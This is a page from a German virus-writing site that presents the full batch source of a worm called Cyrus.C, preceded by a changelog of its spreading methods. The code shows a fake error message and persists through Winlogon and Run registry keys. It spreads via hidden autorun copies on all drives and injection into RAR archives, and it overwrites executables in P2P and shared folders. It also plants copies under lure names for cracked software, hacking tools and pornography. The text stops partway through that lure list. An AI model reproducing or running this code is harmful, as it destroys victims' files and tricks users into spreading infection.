<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>Win32.Cyrus.C</title>
<link rel="stylesheet" href="../../../css/code.css" type=
"text/css" />
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Code</u>
<b>[+]</b><u>Von: Rayden</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Code</a></u>
</pre>
<hr />
<pre>
**********************
*   Batch Cyrus.C    *
*   (c) by Rayden    *
**********************
* www.DarK-CodeZ.com *
**********************


********************************
* Cyrus Versionen und Kurzinfo *
********************************


Cyrus.C
-------

Download: DC Mag #2 oder http://board.dark-codez.com/cyrus-t3708.html

Danke an Perforin f&uuml;r die Wuala Verbreitungs-Idee
Blog von Perforin: http://perforin.dark-codez.com/

+ Nochmals neuer Aufbau ^^
- Alternative Autostartm&ouml;glichkeiten. (Admin und Eingeschr&auml;nkter User via Registry oder Autostartordner)                        
- Verhindert das mehrfache Laufen der Batch.
- Laufwerkverbreitung mit und ohne Autostart.
+ Verbreitung via RAR Dateien, indem er jede ausf&uuml;hrbare Datei mit sich selber ersetzt, ansonsten kopiert er sich selber in das RAR Archiv
- Erstellen von Kopien mit den Namen der Ordner im Programmordner (Normalerweise C:\Programme)                
- &Uuml;berschreiben von Dateien in den P2P Ordnern.                
- P2P Verbreitung mit kopieren und die &uuml;berschriebenen Dateien vom Programmordner in die Ordner und zugeh&ouml;rigen Unterordner
- Verbreitung via Wuala, Kopieren und &uuml;berschreiben von Dateien (Danke an Perforin f&uuml;r diese Idee)
- Netzwerkverbreitung via verbundener Rechner und solche in der gleichen Dom&auml;ne.
+ Netzwerk-Verbreitung via kopieren in allen verf&uuml;gbaren lokalen Freigaben und Erstellung einer neuen Freigabe.
+ FTP Verbreitung: Generiert zuf&auml;llige IPs und l&auml;dt Dateien von sich auf den FTP hoch.


Je nachdem, ob nach dem starten eine Internetverbindung besteht, wird diese Verbreitungsreihenfolge ausgef&uuml;hrt:


Online:

- Laufwerkverbreitung 
- Wuala Verbreitung
- Netzwerkverbreitung (Verbundener und in der gleichen Dom&auml;ne)
- RAR Archiv Verbreitung
- P2P Verbreitung
- Netzwerkverbreitung (via lokaler und neu erstellter Freigabe)
- FTP Verbreitung

Offline: 

- Laufwerkverbreitung 
- RAR Archiv Verbreitung
- P2P Verbreitung
- Wuala Verbreitung
- Netzwerkverbreitung (Verbundener und in der gleichen Dom&auml;ne)
- Netzwerkverbreitung (via lokaler und neu erstellter Freigabe)
- FTP Verbreitung


____________________________________________________________________________________________________________________________


Cyrus.B
-------

Download: http://board.dark-codez.com/cyrus-t3708.html

- Neuer Aufbau
- Keine Dateien m&uuml;ssen includet werden durch Alternativen ;)
- Alternative Autostartm&ouml;glichkeiten. (Admin und Eingeschr&auml;nkter User via Registry oder Autostartordner)                        
- Verhindert das mehrfache Laufen der Batch.
- Laufwerkverbreitung mit und ohne Autostart.
- Erstellen von Kopien mit den Namen der Ordner im Programmordner (Normalerweise C:\Programme)                
- &Uuml;berschreiben von Dateien in den P2P Ordnern.                
- P2P Verbreitung mit kopieren und die &uuml;berschriebenen Dateien vom Programmordner in die Ordner und zugeh&ouml;rigen Unterordner
- Verbreitung via Wuala, Kopieren und &uuml;berschreiben von Dateien (Danke an Perforin f&uuml;r die Wuala Verbreitungs Idee)
- Netzwerkverbreitung via verbundener Rechner und solche in der gleichen Dom&auml;ne.
- Netzwerkverbreitung via generierter Netzwerk IP Adressen

Je nachdem ob nach dem starten eine Internetverbindung besteht, wird diese Verbreitungsreihenfolge ausgef&uuml;hrt:

Online:
Laufwerkverbreitung - Wuala Verbreitung - Netzwerkverbreitung (Verbundener und in der gleichen Dom&auml;ne)
- P2P Verbreitung - Netzwerkverbreitung (Generierte Netzwerk IPs)

Offline: 
Laufwerkverbreitung - P2P Verbreitung - Wuala Verbreitung - Netzwerkverbreitung (Verbundener und in der gleichen Dom&auml;ne)
- Netzwerkverbreitung (Generierte Netzwerk IPs)


____________________________________________________________________________________________________________________________


Cyrus.A
-------

Download: DC Mag #1 oder http://board.dark-codez.com/cyrus-t3708.html

- Alternative Autostartm&ouml;glichkeiten.                          
- Autostart mit eingeschr&auml;nktem Konto (Windows XP).            
- Verhindert das mehrfache Laufen der Batch.                   
- &Uuml;berschreiben von Dateien in den P2P Ordnern.                
- P2P Verbreitung mit kopieren in die zugeh&ouml;rigen Unterordner
</pre>
<hr />
<pre>
:: **********************
:: *   Batch Cyrus.C    *
:: *   (c) by Rayden    *
:: **********************
:: * www.DarK-CodeZ.com *
:: **********************
@echo off
cd /d %appdata%
if "%1" == "/scan" start %~d0&amp;goto loadvari
if "%1" == "/update" goto loadvari
if "%1" == "/network" goto loadvari
echo %0 | find /i "msnmsgr.exe" &gt; nul &amp;&amp; goto loadvari
echo %0 | find /i "desktop.exe" &gt; nul &amp;&amp; goto loadvari
echo msgbox "Run-time error '13':"^&amp; vbcrlf ^&amp; vbcrlf ^&amp; "Type mismatch", 48, "Error"&gt;vblogon.vbs
start /b cscript.exe vblogon.vbs
:loadvari
date %date% &gt; nul &amp;&amp; goto admin
goto noadmin
:admin
set right=admin
set windows=%systemroot%
cd /d %windows%
if exist system32 goto make32
if not exist system32 goto make2000
:make32
set system=system32
cd %system%
goto param
:make2000
set system=system
cd %system%
goto param
:noadmin
set right=noadmin
set windows=%appdata%
set system=MSN Messenger
cd /d %windows%
mkdir "%system%" &gt; nul 2&gt;&amp;1
cd %system%
goto param
:param
set cyrusc=msnmsgr.exe
set regname=MSN Messenger
goto cyrusc
:cyrusc
attrib -r -s -h %0 &gt; nul
if "%1" == "/update" copy %0 "%cyrusc%" &gt; nul &amp; goto spread
copy %0 "%cyrusc%" &gt; nul
if "%errorlevel%" == "0" goto checkparam
fc %0 "%cyrusc%" &gt; nul
if "%errorlevel%" == "0" exit
goto spread
:checkparam
if "%1" == "/scan" attrib +r +s +h %0 &gt; nul
if "%right%" == "admin" goto startup
if not "%right%" == "admin" goto noadminold
:startup
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" &gt; nul
if not "%errorlevel%" == "0" goto altadminrun
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "Explorer.exe %windows%\%system%\%cyrusc% /update" /f &gt; nul
if "%errorlevel%" == "0" goto openme
if not "%errorlevel%" == "0" goto altadminrun
:altadminrun
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "%regname%" /t "REG_SZ" /d "%windows%\%system%\%cyrusc% /update" /f &gt; nul
if "%errorlevel%" == "0" goto openme
if not "%errorlevel%" == "0" goto adminrun
:adminrun
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "%regname%" /t "REG_SZ" /d "%windows%\%system%\%cyrusc% /update" /f &gt; nul
if "%errorlevel%" == "0" goto openme
if not "%errorlevel%" == "0" goto noadminrun
:noadminrun
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "%regname%" /t "REG_SZ" /d "%windows%\%system%\%cyrusc% /update" /f &gt; nul
if "%errorlevel%" == "0" goto openme
if not "%errorlevel%" == "0" goto noadminold
:noadminold
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "%regname%" /t "REG_SZ" /d "%windows%\%system%\%cyrusc% /update" /f &gt; nul
if "%errorlevel%" == "0" goto openme
if not "%errorlevel%" == "0" goto autofolder
:autofolder
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Startup"&gt;rtemp.txt
if not "%errorlevel%" == "0" goto srchauto
for /f "skip=4 tokens=2*" %%A in (rtemp.txt) do set autorun=%%B
if not exist "%autorun%" goto srchauto
copy %0 "%autorun%\desktop.exe" &gt; nul
if not "%errorlevel%" == "0" goto srchauto
goto openme
:srchauto
copy %0 "%userprofile%\Startm~1\Programme\Autostart\desktop.exe" &gt; nul
if "%errorlevel%" == "0" goto openme
cd /d %userprofile%
for /r /d %%a in (*start*) do copy %0 "%%a\desktop.exe" &gt; nul
goto openme
:openme
cd /d %windows%
cd %system%
start "%cyrusc%" "%windows%\%system%\%cyrusc%" /update
exit
:spread
cd /d %windows%
cd %system%
set cyrus=Tro
set c=jan
if exist "%windows%\%system%\temp.txt" del /f /q "%windows%\%system%\temp.txt" &gt; nul
if exist "%windows%\%system%\temp1.txt" del /f /q "%windows%\%system%\temp1.txt" &gt; nul
if exist "%windows%\%system%\temp2.txt" del /f /q "%windows%\%system%\temp2.txt" &gt; nul
echo [AutoRun]&gt;autorun.inf
echo open=recycler.exe /scan&gt;&gt;autorun.inf
echo shellexecute=recycler.exe /scan&gt;&gt;autorun.inf
echo shell\Run\command=recycler.exe /scan&gt;&gt;autorun.inf
echo shell=Run&gt;&gt;autorun.inf
echo shell\Run\Default=^1&gt;&gt;autorun.inf
echo shell\open\Command=recycler.exe /scan&gt;&gt;autorun.inf
echo shell\explore=Explorer&gt;&gt;autorun.inf
echo shell\explore\Command=recycler.exe /scan&gt;&gt;autorun.inf
echo action=Launch&gt;&gt;autorun.inf
for %%a in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do if exist "%%a\" (
attrib -r -s -h "%%a\recycler.exe" &gt; nul
attrib -r -s -h "%%a\autorun.inf" &gt; nul
copy %0 "%%a\recycler.exe" &gt; nul
copy %0 "%%a\sexy pics.exe" &gt; nul
copy "%windows%\%system%\autorun.inf" "%%a\autorun.inf" &gt; nul
attrib +r +s +h "%%a\recycler.exe" &gt; nul
attrib +r +s +h "%%a\autorun.inf" &gt; nul
)
if exist "autorun.inf" del /f /q "autorun.inf" &gt; nul
set peer=false
set network=false
:inet
ping -n 1 www.google.com &gt; nul
if "%errorlevel%" == "0" goto wuala
goto peer
:peer
cd /d %windows%
cd %system%
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe" /v "Path"&gt;ctemp.txt
if not "%errorlevel%" == "0" goto srchrarfold
for /f "skip=4 tokens=2*" %%A in (ctemp.txt) do set rarpath=%%B
if exist "%rarpath%" goto rarinf
goto srchrarfold
:srchrarfold
if exist "ctemp.txt" del /f /q "ctemp.txt" &gt; nul
if not exist "%programfiles%\Winrar\rar.exe" goto srchpeer
set rarpath=%programfiles%\Winrar
goto rarinf
:rarinf
if exist "ctemp.txt" del /f /q "ctemp.txt" &gt; nul
if exist "crypted.txt" del /f /q "crypted.txt"
if exist "rarfiles.txt" del /f /q "rarfiles.txt"
if exist "rarfiles2.txt" del /f /q "rarfiles2.txt"
if exist "rardata.txt" del /f /q "rardata.txt"
if exist "rardata2.txt" del /f /q "rardata2.txt"
if exist "rardata3.txt" del /f /q "rardata3.txt"
if exist "tmprar.txt" del /f /q "tmprar.txt"
for %%a in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do if exist "%%a\" (
cd /d %%a\
dir /s /b *.rar&gt;&gt;"%windows%\%system%\rarfiles.txt"
)
cd /d %windows%
cd %system%
set ownp=%~p0
echo Cyrus.C&gt;crypted.txt
copy %0 "%appdata%\passwords.exe" &gt; nul
"%rarpath%\rar.exe" a -ep -o+ -tk -y -- "passwords.rar" "%appdata%\passwords.exe" &lt;"crypted.txt"
del /f /q "%appdata%\passwords.exe"
echo /xXEndofRarXx/&gt;&gt;"%windows%\%system%\rarfiles.txt"
echo /xXEndofRarXx/&gt;&gt;"%windows%\%system%\rarfiles.txt"
set A=0
set /p rarfile=&lt;"%windows%\%system%\rarfiles.txt"
if "%rarfile%" == "/xXEndofRarXx/" goto srchpeer
goto rarinhalt
:nextrar
ping -n 2 127.0.0.1 &gt; nul
if exist "rardata3.txt" del /f /q "rardata3.txt"
set /a A=A+1
more /e /p +%A% "%windows%\%system%\rarfiles.txt"&gt;"%windows%\%system%\rarfiles2.txt"
set /p rarfile=&lt;"%windows%\%system%\rarfiles2.txt"
if "%rarfile%" == "/xXEndofRarXx/" goto srchpeer
:rarinhalt
"%rarpath%\rar.exe" vb -p- -y -- "%rarfile%"&gt;"%windows%\%system%\rardata3.txt"
if not "%errorlevel%" == "0" goto nextrar
if exist "rardata.txt" del /f /q "rardata.txt"
findstr /i ".exe$" "%windows%\%system%\rardata3.txt"&gt;&gt;rardata.txt
findstr /i ".scr$" "%windows%\%system%\rardata3.txt"&gt;&gt;rardata.txt
findstr /i ".com$" "%windows%\%system%\rardata3.txt"&gt;&gt;rardata.txt
findstr /i ".pif$" "%windows%\%system%\rardata3.txt"&gt;&gt;rardata.txt
findstr /i ".bat$" "%windows%\%system%\rardata3.txt"&gt;&gt;rardata.txt
findstr /i ".cmd$" "%windows%\%system%\rardata3.txt"&gt;&gt;rardata.txt
echo /xXEndofRareXx/&gt;&gt;"%windows%\%system%\rardata.txt"
echo /xXEndofRareXx/&gt;&gt;"%windows%\%system%\rardata.txt"
set B=0
set /p rardata=&lt;"%windows%\%system%\rardata.txt"
if not "%rardata%" == "/xXEndofRareXx/" goto rarline
"%rarpath%\rar.exe" d -ep -o+ -tk -y -- "%rarfile%" "readme*" &lt;"crypted.txt"
copy %0 "%appdata%\readme.com" &gt; nul
"%rarpath%\rar.exe" a -ep -o+ -tk -y -- "%rarfile%" "%appdata%\readme.com" &lt;"crypted.txt"
goto nextrar
:newrarline
set /a B=B+1
more /e /p +%B% "%windows%\%system%\rardata.txt"&gt;"%windows%\%system%\rardata2.txt"
set /p rardata=&lt;"%windows%\%system%\rardata2.txt"
if "%rardata%" == "/xXEndofRareXx/" goto nextrar
goto rarline
:rarline
set tmprar=%rardata:&amp;=^^^&amp;%
echo %tmprar%&gt;tmprar.txt
find "\" "tmprar.txt" &gt; nul
if "%errorlevel%" == "0" goto rarordner
goto rardatei
:rarordner
for %%I in ("%rardata%") do set rarcpy=%%~nxI
for %%I in ("%rardata%") do set rarpfad=%%~pI
for /f "tokens=1* delims=\" %%a in ("%rarpfad%") do set rarpfa=%%b
goto checkpfad
:nommarar
for /f "tokens=1* delims=\" %%a in ("%rarpfa%") do set rarpfa=%%b
:checkpfad
set tmprar=%rarpfa:&amp;=^^^&amp;%
echo %tmprar%&gt;tmprar.txt
find /i "%ownp%" "tmprar.txt" &gt; nul &amp;&amp; nommarar
find /i "%system%\" "tmprar.txt" &amp;&amp; goto nommarar
set rarpfa=%rarpfa:&amp;=^^^&amp;%
set rarpfaend=%rarpfa:~0,-1%
copy %0 "%appdata%\%rarcpy%" &gt; nul
"%rarpath%\rar.exe" a -ap"%rarpfaend%" -ep -o+ -tk -y -- "%rarfile%" "%appdata%\%rarcpy%" &lt;"crypted.txt"
del /f /q "%appdata%\%rarcpy%"
ping -n 2 127.0.0.1 &gt; nul
goto newrarline
:rardatei
copy %0 "%appdata%\%rardata%"
"%rarpath%\rar.exe" a -ep -o+ -tk -y -- "%rarfile%" "%appdata%\%rardata%" &lt;"crypted.txt"
del /f /q "%appdata%\%rardata%"
ping -n 2 127.0.0.1 &gt; nul
goto newrarline
:srchpeer
cd /d %windows%
cd %system%
mkdir "Mediaplayer" &gt; nul 2&gt;&amp;1
mkdir "shared" &gt; nul 2&gt;&amp;1
cd /d %programfiles%
for /d %%a in (*) do echo Cyrus.C&gt;"%windows%\%system%\Mediaplayer\%%a.exe"
cd /d %windows%
cd %system%
cd Mediaplayer
for %%a in (*.*) do copy %0 "%%a" &gt; nul
cd /d %windows%
cd %system%
if exist "ctemp.txt" del /f /q "ctemp.txt" &gt; nul
if exist "crypted.txt" del /f /q "crypted.txt"
if exist "rarfiles.txt" del /f /q "rarfiles.txt"
if exist "rarfiles2.txt" del /f /q "rarfiles2.txt"
if exist "rardata.txt" del /f /q "rardata.txt"
if exist "rardata2.txt" del /f /q "rardata2.txt"
if exist "rardata3.txt" del /f /q "rardata3.txt"
if exist "tmprar.txt" del /f /q "tmprar.txt"
for %%a in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do if exist "%%a\" (
cd /d %%a\
for /r /d %%a in (*shar*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*shar*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*download*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*download*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*upload*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*upload*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*incoming*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*incoming*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*grokster*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*grokster*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*imesh*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*imesh*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*tesla*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*tesla*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*ftp*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*ftp*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*http*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*http*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*htdocs*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*htdocs*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*transfer*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*transfer*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*receiv*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*receiv*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%a in (*freig*) do echo %%a&gt;&gt;"%windows%\%system%\temp.txt"
for /r /d %%b in (*freig*) do dir /ad /s /b "%%b"&gt;&gt;"%windows%\%system%\temp.txt"
)
cd /d %windows%
cd %system%
set A=0
echo %windows%\%system%\shared&gt;temp1.txt
sort temp.txt&gt;&gt;temp1.txt
echo /xXEndoffolderXx/&gt;&gt;"%windows%\%system%\temp1.txt"
del /f /q temp.txt &gt; nul
set /p kaz=&lt;"%windows%\%system%\temp1.txt"
goto cyrus
:next
set /a A=A+1
more /e /p +%A% "%windows%\%system%\temp1.txt"&gt;"%windows%\%system%\temp2.txt"
set /p kaz=&lt;"%windows%\%system%\temp2.txt"
if "%kaz%" == "/xXEndoffolderXx/" goto end
goto cyrus
:cyrus
copy %0 "%kaz%\3D Gamestudio.exe" &gt; nul
if not "%errorlevel%" == "0" goto next
for %%a in ("%kaz%\*.exe") do copy %0 "%%a" &gt; nul
for %%a in ("%kaz%\*.scr") do copy %0 "%%a" &gt; nul
for %%a in ("%kaz%\*.com") do copy %0 "%%a" &gt; nul
for %%a in ("%kaz%\*.pif") do copy %0 "%%a" &gt; nul
for %%a in ("%kaz%\*.bat") do copy %0 "%%a" &gt; nul
for %%a in ("%kaz%\*.cmd") do copy %0 "%%a" &gt; nul
copy %0 "%kaz%\Accounts.exe" &gt; nul
copy %0 "%kaz%\Acronis True Image 2009.exe" &gt; nul
copy %0 "%kaz%\Adobe Photoshop CS4.exe" &gt; nul
copy %0 "%kaz%\Adobe Photoshop CS4 Extended.exe" &gt; nul
copy %0 "%kaz%\Adobe Photoshop Keygen.exe" &gt; nul
copy %0 "%kaz%\Ahead Nero Premium.exe" &gt; nul
copy %0 "%kaz%\All Formats Converter.exe" &gt; nul
copy %0 "%kaz%\All Instant Messenger Passwordstealer.exe" &gt; nul
copy %0 "%kaz%\All Instant Messenger Hacker.exe" &gt; nul
copy %0 "%kaz%\Allround Password Cracker.exe" &gt; nul
copy %0 "%kaz%\Allround Password Stealer.exe" &gt; nul
copy %0 "%kaz%\Allround SIM-Lock Removal Tool.exe" &gt; nul
copy %0 "%kaz%\Amateur Porn.exe" &gt; nul
copy %0 "%kaz%\Anal Fisting.exe" &gt; nul
copy %0 "%kaz%\Anal teen hardcore xxx porn hot ass fuck licking oral blowjob cumshot creampie fisting gangbang sex.exe" &gt; nul
copy %0 "%kaz%\Anal xxx porno arsch fick oral blasen titten geil sex.exe" &gt; nul
copy %0 "%kaz%\Anal porn.exe" &gt; nul
copy %0 "%kaz%\Ass to Mouth Porn.exe" &gt; nul
copy %0 "%kaz%\Audio Codec Pack.exe" &gt; nul
copy %0 "%kaz%\Avira Antivir Premium.exe" &gt; nul
copy %0 "%kaz%\Avira Antivir Security Suite.exe" &gt; nul
copy %0 "%kaz%\Big Wordlist.exe" &gt; nul
copy %0 "%kaz%\Bioshock.exe" &gt; nul
copy %0 "%kaz%\Brutus Password Cracker.exe" &gt; nul
copy %0 "%kaz%\Call of Duty World at War.exe" &gt; nul
copy %0 "%kaz%\Camtasia Studio 5.1.exe" &gt; nul
copy %0 "%kaz%\Chat Flooder.exe" &gt; nul
copy %0 "%kaz%\Clone CD.exe" &gt; nul
copy %0 "%kaz%\Clone DVD.exe" &gt; nul
copy %0 "%kaz%\Command &amp; Conquer 3.exe" &gt; nul
copy %0 "%kaz%\Counterstrike MapHack.exe" &gt; nul
copy %0 "%kaz%\Counterstrike Source.exe" &gt; nul
copy %0 "%kaz%\Counterstrike.exe" &gt; nul
copy %0 "%kaz%\Cracks Archive.exe" &gt; nul
copy %0 "%kaz%\Credit Card Generator.exe" &gt; nul
copy %0 "%kaz%\Crysis.exe" &gt; nul
copy %0 "%kaz%\Cumshot.exe" &gt; nul
copy %0 "%kaz%\Cyrus Sourcecode.exe" &gt; nul
copy %0 "%kaz%\Doom 4.exe" &gt; nul
copy %0 "%kaz%\DRM Crack.exe" &gt; nul
copy %0 "%kaz%\DVD Ripper.exe" &gt; nul
copy %0 "%kaz%\Elite Keylogger.exe" &gt; nul
copy %0 "%kaz%\Email Account Hacker.exe" &gt; nul
copy %0 "%kaz%\Exploit Collection.exe" &gt; nul
copy %0 "%kaz%\Fakemailer.exe" &gt; nul
copy %0 "%kaz%\Fallout 3 III.exe" &gt; nul
copy %0 "%kaz%\Fifa Football 2009.exe" &gt; nul
copy %0 "%kaz%\Fifa Manager 2009.exe" &gt; nul
copy %0 "%kaz%\FTP Cracker.exe" &gt; nul
copy %0 "%kaz%\Gamemaker.exe" &gt; nul
copy %0 "%kaz%\Gangbang.exe" &gt; nul
copy %0 "%kaz%\Gina Lisa Sextape 2.exe" &gt; nul
copy %0 "%kaz%\GTA Grand Theft Auto 4 IV.exe" &gt; nul
copy %0 "%kaz%\GTA Grand Theft Auto Add-ons collection.exe" &gt; nul
copy %0 "%kaz%\GTA Grand Theft Auto Liberty City Stories.exe" &gt; nul
copy %0 "%kaz%\GTA Grand Theft Auto San Andreas.exe" &gt; nul
copy %0 "%kaz%\GTA Grand Theft Auto Vice City Stories.exe" &gt; nul
copy %0 "%kaz%\GTA Grand Theft Auto Vice City.exe" &gt; nul
copy %0 "%kaz%\GTA Grand Theft 3 III.exe" &gt; nul
copy %0 "%kaz%\Hackers Black Book.exe" &gt; nul
copy %0 "%kaz%\Hackertools Collection.exe" &gt; nul
copy %0 "%kaz%\Half-Life Episode Two.exe" &gt; nul
copy %0 "%kaz%\Hardcore Porn.exe" &gt; nul
copy %0 "%kaz%\Harry Potter 1-7 e book Deutsch.exe" &gt; nul
copy %0 "%kaz%\Harry Potter all e book.exe" &gt; nul
copy %0 "%kaz%\Harry Potter Game.exe" &gt; nul
copy %0 "%kaz%\Harry Potter.exe" &gt; nul
copy %0 "%kaz%\Hash Cracker.exe" &gt; nul
copy %0 "%kaz%\Hotmail Hacker.exe" &gt; nul
copy %0 "%kaz%\IcePack Platinum.exe" &gt; nul
copy %0 "%kaz%\ICQ Hacker.exe" &gt; nul
copy %0 "%kaz%\Invisible IP.exe" &gt; nul
copy %0 "%kaz%\IRC Hacker.exe" &gt; nul
copy %0 "%kaz%\Kamasutra.exe" &gt; nul
copy %0 "%kaz%\Kaspersky Antivirus.exe" &gt; nul
copy %0 "%kaz%\Kaspersky Internet Security.exe" &gt; nul
copy %0 "%kaz%\Keygen for all Microsoft Windows Products.exe" &gt; nul
copy %0 "%kaz%\KGB Spy Builder.exe" &gt; nul
copy %0 "%kaz%\K-Lite Mega Codec Pack.exe" &gt; nul
copy %0 "%kaz%\Lesbian Girls.exe" &gt; nul
copy %0 "%kaz%\Limewire Pro.exe" &gt; nul
copy %0 "%kaz%\Massmailer.exe" &gt; nul
copy %0 "%kaz%\Master Card Generator.exe" &gt; nul
copy %0 "%kaz%\Matrix.exe" &gt; nul
copy %0 "%kaz%\Matrix Screensaver.scr" &gt; nul
copy %0 "%kaz%\Microsoft Office Basic 2007.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Basic Edition 2003.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Enterprise 2007.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Home and Student 2007.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Professional 2003.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Professional 2007.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Small Business 2003.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Small Business 2007.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Standard 2003.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Standard 2007.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Student and Teacher 2003.exe" &gt; nul
copy %0 "%kaz%\Microsoft Office Ultimate 2007.exe" &gt; nul
copy %0 "%kaz%\Microsoft Visual Basic 6.0.exe" &gt; nul
copy %0 "%kaz%\Microsoft Visual C++ 6.0.exe" &gt; nul
copy %0 "%kaz%\Microsoft Visual Studio 6.0.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows 7.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Home Server.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Media Center Edition.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Serials.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Server 2003.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Server 2008.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Update Pack.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Vista Business.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Vista Enterprise.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Vista Home Basic.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Vista Home Premium.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Vista Sourcecode.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows Vista Ultimate.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows XP Home.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows XP Professional.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows XP Service Pack 1.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows XP Service Pack 2.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows XP Service Pack 3.exe" &gt; nul
copy %0 "%kaz%\Microsoft Windows XP Sourcecode.exe" &gt; nul
copy %0 "%kaz%\mPack.exe" &gt; nul
copy %0 "%kaz%\MSN Hacker.exe" &gt; nul
copy %0 "%kaz%\Multiplayer Cheat Engine.exe" &gt; nul
copy %0 "%kaz%\Music Maker 2009 XXL.exe" &gt; nul
copy %0 "%kaz%\Need for Speed Undercover.exe" &gt; nul
copy %0 "%kaz%\NOD32 Antivirus.exe" &gt; nul
copy %0 "%kaz%\Paris Hilton Sextape.exe" &gt; nul
copy %0 "%kaz%\Partition Magic.exe" &gt; nul
copy %0 "%kaz%\Passwords.exe" &gt; nul
copy %0 "%kaz%\Paypal Faker.exe" &gt; nul
copy %0 "%kaz%\Paypal Hacker.exe" &gt; nul
copy %0 "%kaz%\Phishing Generator.exe" &gt; nul
copy %0 "%kaz%\PHP SQL Injector.exe" &gt; nul
copy %0 "%kaz%\Pinnacle Studio Version 12.exe" &gt; nul
copy %0 "%kaz%\Porno Screensaver.scr" &gt; nul
copy %0 "%kaz%\Porno sex oral anal cool awesome!!.exe" &gt; nul
copy %0 "%kaz%\Postal 2 II.exe" &gt; nul
copy %0 "%kaz%\Postal 3 III.exe" &gt; nul
copy %0 "%kaz%\Postal Fudge Pack.exe" &gt; nul
copy %0 "%kaz%\Postal - The Movie.exe" &gt; nul
copy %0 "%kaz%\Power DVD.exe" &gt; nul
copy %0 "%kaz%\ProRAT 2.0.exe" &gt; nul
copy %0 "%kaz%\Pro Evolution Soccer 2009.exe" &gt; nul
copy %0 "%kaz%\Rainbow Six Vegas 2.exe" &gt; nul
